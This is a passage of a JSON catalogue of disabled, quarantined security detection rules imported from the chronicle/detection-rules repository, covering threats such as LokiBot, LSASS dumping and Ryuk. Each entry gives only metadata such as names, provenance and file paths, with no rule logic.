"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lokibot_detector_windows10_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/lokibot_detector__windows10___sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-lokibot-malware-detector-sysmon-behavior", "type": "detection", "name": "lokibot_malware_detector_sysmon_behavior", "description": "lokibot_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lokibot-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lokibot_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/lokibot_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-lokibot-malware-detector-sysmon-behavior-july-2019", "type": "detection", "name": "lokibot_malware_detector_sysmon_behavior_july_2019", "description": "lokibot_malware_detector_sysmon_behavior_july_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lokibot-malware-detector-sysmon-behavior-july-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lokibot_malware_detector_sysmon_behavior_july_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/lokibot_malware_detector__sysmon_behavior___july_2019.yaral" } }, { "id": "chronicle-detection-rules-lokibot-trojan-behavior-sysmon", "type": "detection", "name": "lokibot_trojan_behavior_sysmon", "description": "lokibot_trojan_behavior_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lokibot-trojan-behavior-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lokibot_trojan_behavior_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/lokibot_trojan_behavior__sysmon.yaral" } }, { "id": "chronicle-detection-rules-lolbas-wslexe-via-cmdline", "type": "detection", "name": "lolbas_wslexe_via_cmdline", "description": "lolbas_wslexe_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lolbas-wslexe-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lolbas_wslexe_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/lolbas_wsl_exe__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-low-prevalence-hash-on-process-launch-low-prevalence-domain-accessed", "type": "detection", "name": "low_prevalence_hash_on_process_launch_low_prevalence_domain_accessed", "description": "low_prevalence_hash_on_process_launch_low_prevalence_domain_accessed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/low-prevalence-hash-on-process-launch-low-prevalence-domain-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "low_prevalence_hash_on_process_launch_low_prevalence_domain_accessed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/low_prevalence_hash_on_process_launch_low_prevalence_domain_accessed.yaral" } }, { "id": "chronicle-detection-rules-lsass-access-detected-via-attack-surface-reduction", "type": "detection", "name": "lsass_access_detected_via_attack_surface_reduction", "description": "lsass_access_detected_via_attack_surface_reduction", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-access-detected-via-attack-surface-reduction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_access_detected_via_attack_surface_reduction", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows_defender/lsass_access_detected_via_attack_surface_reduction.yaral" } }, { "id": "chronicle-detection-rules-lsass-dump-keyword-command-line", "type": "detection", "name": "lsass_dump_keyword_command_line", "description": "lsass_dump_keyword_command_line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-dump-keyword-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_dump_keyword_command_line", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/lsass_dump_keyword_command_line.yaral" } }, { "id": "chronicle-detection-rules-lsass-memory-access-by-tool-dump-keyword-name", "type": "detection", "name": "lsass_memory_access_by_tool_dump_keyword_name", "description": "lsass_memory_access_by_tool_dump_keyword_name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-memory-access-by-tool-dump-keyword-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_memory_access_by_tool_dump_keyword_name", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/lsass_memory_access_by_tool_dump_keyword_name.yaral" } }, { "id": "chronicle-detection-rules-lsass-memory-dump-comsvcs-dll", "type": "detection", "name": "lsass_memory_dump_comsvcs_dll", "description": "lsass_memory_dump_comsvcs_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-memory-dump-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_memory_dump_comsvcs_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/lsass_memory_dump_comsvcs_dll.yaral" } }, { "id": "chronicle-detection-rules-lsass-process-memory-dump-file-creation", "type": "detection", "name": "lsass_process_memory_dump_file_creation", "description": "lsass_process_memory_dump_file_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-process-memory-dump-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_process_memory_dump_file_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/lsass_process_memory_dump_file_creation.yaral" } }, { "id": "chronicle-detection-rules-lsass-process-memory-dump-file-creation-taskmgr", "type": "detection", "name": "lsass_process_memory_dump_file_creation_taskmgr", "description": "lsass_process_memory_dump_file_creation_taskmgr", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-process-memory-dump-file-creation-taskmgr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_process_memory_dump_file_creation_taskmgr", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/lsass_process_memory_dump_file_creation_taskmgr.yaral" } }, { "id": "chronicle-detection-rules-lsassexe-detected-running-from-a-suspicious-location", "type": "detection", "name": "lsassexe_detected_running_from_a_suspicious_location", "description": "lsassexe_detected_running_from_a_suspicious_location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsassexe-detected-running-from-a-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsassexe_detected_running_from_a_suspicious_location", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/lsass_exe_detected_running_from_a_suspicious_location.yaral" } }, { "id": "chronicle-detection-rules-malicious-base64-encoded-powershell-keywords-in-command-lines", "type": "detection", "name": "malicious_base64_encoded_powershell_keywords_in_command_lines", "description": "malicious_base64_encoded_powershell_keywords_in_command_lines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-base64-encoded-powershell-keywords-in-command-lines.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_base64_encoded_powershell_keywords_in_command_lines", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.yaral" } }, { "id": "chronicle-detection-rules-malicious-behaviour-on-user-login-microsoft-windows-c0d0s0-group-behavior", "type": "detection", "name": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior", "description": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-behaviour-on-user-login-microsoft-windows-c0d0s0-group-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/file_event/malicious_behaviour_on_user_login__microsoft_windows___c0d0s0_group_behavior_part_1.yaral" } }, { "id": "chronicle-detection-rules-malicious-behaviour-on-user-login-microsoft-windows-c0d0s0-group-behavior-part-1", "type": "detection", "name": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior_part_1", "description": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-behaviour-on-user-login-microsoft-windows-c0d0s0-group-behavior-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/file_event/malicious_behaviour_on_user_login__microsoft_windows___c0d0s0_group_behavior_part_2.yaral" } }, { "id": "chronicle-detection-rules-malicious-powershell-commandlet-names", "type": "detection", "name": "malicious_powershell_commandlet_names", "description": "malicious_powershell_commandlet_names", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-powershell-commandlet-names.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_powershell_commandlet_names", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/malicious_powershell_commandlet_names.yaral" } }, { "id": "chronicle-detection-rules-malicious-service-installations", "type": "detection", "name": "malicious_service_installations", "description": "malicious_service_installations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-service-installations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_service_installations", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/malicious_service_installations.yaral" } }, { "id": "chronicle-detection-rules-malicious-utilization-of-mofcompexe-via-cmd", "type": "detection", "name": "malicious_utilization_of_mofcompexe_via_cmd", "description": "malicious_utilization_of_mofcompexe_via_cmd", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-utilization-of-mofcompexe-via-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_utilization_of_mofcompexe_via_cmd", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/malicious_utilization_of_mofcomp_exe_via_cmd.yaral" } }, { "id": "chronicle-detection-rules-malware-apt-grizzly-steppe-user-agent", "type": "detection", "name": "malware_apt_grizzly_steppe_user_agent", "description": "malware_apt_grizzly_steppe_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-apt-grizzly-steppe-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_apt_grizzly_steppe_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/apt_grizzly_steppe_user_agent.yaral" } }, { "id": "chronicle-detection-rules-malware-apt-plugx-user-agent", "type": "detection", "name": "malware_apt_plugx_user_agent", "description": "malware_apt_plugx_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-apt-plugx-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_apt_plugx_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/apt_plugx_user_agent.yaral" } }, { "id": "chronicle-detection-rules-malware-badnews-staging-exfil", "type": "detection", "name": "malware_badnews_staging_exfil", "description": "malware_badnews_staging_exfil", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-badnews-staging-exfil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_badnews_staging_exfil", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/badnews_staging_exfil.yaral" } }, { "id": "chronicle-detection-rules-malware-bankshot", "type": "detection", "name": "malware_bankshot", "description": "malware_bankshot", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-bankshot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_bankshot", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/bankshot.yaral" } }, { "id": "chronicle-detection-rules-malware-dridex-dropper-doc-20191217", "type": "detection", "name": "malware_dridex_dropper_doc_20191217", "description": "malware_dridex_dropper_doc_20191217", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-dridex-dropper-doc-20191217.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_dridex_dropper_doc_20191217", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/dridex_dropper_doc_20191217.yaral" } }, { "id": "chronicle-detection-rules-malware-gallium", "type": "detection", "name": "malware_gallium", "description": "malware_gallium", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-gallium.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_gallium", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/gallium.yaral" } }, { "id": "chronicle-detection-rules-malware-httpbrowser", "type": "detection", "name": "malware_httpbrowser", "description": "malware_httpbrowser", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-httpbrowser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_httpbrowser", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/httpbrowser.yaral" } }, { "id": "chronicle-detection-rules-malware-lokibot-c2", "type": "detection", "name": "malware_lokibot_c2", "description": "malware_lokibot_c2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-lokibot-c2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_lokibot_c2", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/lokibot_c2.yaral" } }, { "id": "chronicle-detection-rules-malware-rawpos", "type": "detection", "name": "malware_rawpos", "description": "malware_rawpos", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-rawpos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_rawpos", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/rawpos.yaral" } }, { "id": "chronicle-detection-rules-malware-ryuk-ransomnote-created", "type": "detection", "name": "malware_ryuk_ransomnote_created", "description": "malware_ryuk_ransomnote_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-ryuk-ransomnote-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_ryuk_ransomnote_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/ryuk_ransomnote_created.yaral" } }, { "id": "chronicle-detection-rules-malware-servhelper-bot", "type": "detection", "name": "malware_servhelper_bot", "description": "malware_servhelper_bot", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-servhelper-bot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_servhelper_bot", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/servhelper_bot.yaral" } }, { "id": "chronicle-detection-rules-malware-servhelper-nsis-dropper", "type": "detection", "name": "malware_servhelper_nsis_dropper", "description": "malware_servhelper_nsis_dropper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-servhelper-nsis-dropper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_servhelper_nsis_dropper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/servhelper_nsis_dropper.yaral" } }, { "id": "chronicle-detection-rules-malware-sload-dropper", "type": "detection", "name": "malware_sload_dropper", "description": "malware_sload_dropper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-sload-dropper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_sload_dropper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/sload_dropper.yaral" } }, { "id": "chronicle-detection-rules-malware-user-agent", "type": "detection", "name": "malware_user_agent", "description": "malware_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/malware_user_agent.yaral" } }, { "id": "chronicle-detection-rules-malware-wannacry-killswitch-domain", "type": "detection", "name": "malware_wannacry_killswitch_domain", "description": "malware_wannacry_killswitch_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-wannacry-killswitch-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_wannacry_killswitch_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 